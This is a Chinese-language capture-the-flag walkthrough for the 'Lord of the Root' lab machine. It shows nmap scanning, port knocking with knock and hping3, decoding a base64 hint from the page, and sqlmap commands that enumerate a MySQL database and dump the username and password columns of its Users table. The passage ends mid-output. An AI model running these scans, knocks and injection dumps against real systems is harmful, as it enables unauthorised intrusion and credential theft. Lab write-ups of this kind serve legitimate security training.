Load of the Root-1
1.nmap 收集信息
nmap 192.168.81.128 -p-
22/tcp open ssh
2.端口碰撞
端口碰撞后会新增:1337/tcp open
1)第一种方法:knock 命令
linux安装:sudo apt install knockd
使用:
knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v
knock 192.168.81.128 1 2 3 -v
2)hping3:TCP/IP数据包组装/分析工具
hping3 -S [IP地址] -p 1 -c 1
hping3 -S 192.168.81.128 -p 1 -c 1
hping3 -S 192.168.81.128 -p 2 -c 1
hping3 -S 192.168.81.128 -p 3 -c 1
3.网页信息枚举
http://192.168.81.128:1337/robot.txt
F12 发现疑似字符串 :THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer! ---第一次解码
/978345210/index.php ---第二次解码
4.发现页面进行sql注入
1)爆破数据库库信息
sqlmap -o -u "http://192.168.81.128:1337/978345210/index.php" --forms --dbs
Optimization
-o:开启所有优化开关
--predict-output:预测常见的查询输出
--keep-alive:使用持久的HTTP(S)连接
--null-connection:从没有实际的HTTP响应体中检索页面长度
--threads=THREADS:设置请求的并发数
--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试
-------------
2)爆破数据库表信息
sqlmap -o -u "http://192.168.81.128:1337/978345210/index.php" --forms -D Webapp --tables
3)爆破数据库列名信息
sqlmap -o -u "http://192.168.81.128:1337/978345210/index.php" --forms -D Webapp -T Users --columns
4)爆破数据库内容
sqlmap -o -u "http://192.168.81.128:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump
(-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、--dump:导出列里面的字段)
[*] information_schema ---库名字
[*] mysql
[*] performance_schema
[*] Webapp
+-------+
| Users | ---表名
+-------+
[3 columns]
+----------+--------------+ ---字段名
| Column | Type |
+----------+--------------+
| id | int(10) |
| password |